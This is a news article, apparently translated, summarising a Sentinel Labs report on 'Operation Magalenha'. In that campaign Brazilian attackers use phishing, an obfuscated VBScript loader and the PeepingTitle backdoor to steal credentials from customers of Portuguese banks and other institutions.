Brazilian hackers have been stealing from Portuguese banks for several years using the “PeepingTitle” backdoor

A Brazilian hacker group has been attacking Portuguese public and private financial institutions, including major banks, in a malicious campaign called “Operation Magalenha” that has been ongoing since 2021. The latest wave of the operation is aimed at the Portuguese energy company Energias de Portugal and the Portuguese Tax and Customs Authority.

To infect their targets, cyberthugs use a long chain of actions, including phishing emails, social engineering, and redirecting victims to fake sites.

The new wave of the operation was announced by Sentinel Labs in its today’s report which disclosed the tools and methods for distributing malware used by attackers.

Experts were able to identify the origin and tactics of hackers thanks to an error in setting up the server used by the attackers. The researchers were able to access files, directories, internal correspondence and other data of criminals.

In all cases, infection starts with phishing emails containing an obfuscated script. VBScriptwhich, when launched, downloads and activates the malware loader, which in turn installs two versions of the PeepingTitle backdoor on the victim’s system at once.

“VBScript scripts are obfuscated in such a way that malicious code is scattered among a large number of code comments, which are usually copied content from publicly available repositories. This is a simple yet effective technique for bypassing static detection mechanisms,” the analysts explained in the report.

The researchers also added that the main purpose of the VBScript script in the campaign is to distract users during malware downloads, redirect them to fake portals of target institutions, and then collect their credentials there.

The PeepingTitle backdoor instance analyzed by specialists, which was mentioned above, is written in Delphi and compiled in April this year. Sentinel Labs believes it was developed by one person or a small team.

The reason why hackers install two versions of the backdoor at once on the victim’s system is that one of the backdoors is used to capture the screen of the infected system, and the other is used to monitor windows and track user interaction with them. In addition, the second backdoor can download additional malicious payloads.

Malicious software constantly scans running sites on the target computer, and when it finds one of the sites necessary for attackers, it starts recording all the data displayed and entered there, in order to then send it to C2 server hackers.

PeepingTitle can also take screenshots, kill processes, change its monitoring interval configuration, and launch payloads from executables or DLL-files.

Sentinel Labs notes several cases where Brazilian attackers have demonstrated the ability to adapt and quickly overcome some technical problems. So, in mid-2022, the group stopped using DigitalOcean Spaces for hosting and distributing malware, replacing it with a number of other, lesser-known cloud providers. Analysts believe that this was due to the fact that DigitalOcean interfered with the work of hackers too often and made it difficult for them.